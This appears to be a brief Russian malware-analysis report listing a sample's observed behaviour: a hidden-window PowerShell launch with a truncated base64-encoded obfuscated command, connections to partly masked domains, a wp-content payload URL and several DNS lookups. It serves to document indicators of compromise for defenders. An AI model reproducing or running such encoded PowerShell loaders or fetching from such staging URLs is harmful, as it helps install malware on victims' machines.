Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABBAHIAbQBrAHkAagBoAHIAZwBpAD0AJwBMAHoAbwBhAGQAdgB0AGQAeAB5AHIAawAnADsAJABLAGwAbwBxAG4AYQB4AGwAIAA9AC...
- 'ke###nlokum.com':443
- 'oc###360.com':80
- http://www.oc###360.com/wp-content/0Y/
- 'ke###nlokum.com':443
- DNS ASK io####arning.com
- DNS ASK ke###nlokum.com
- DNS ASK oc###360.com
- DNS ASK li###ap507.com
- DNS ASK af###indcs.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABBAHIAbQBrAHkAagBoAHIAZwBpAD0AJwBMAHoAbwBhAGQAdgB0AGQAeAB5AHIAawAnADsAJABLAGwAbwBxAG4AYQB4AGwAIAA9AC...' (со скрытым окном)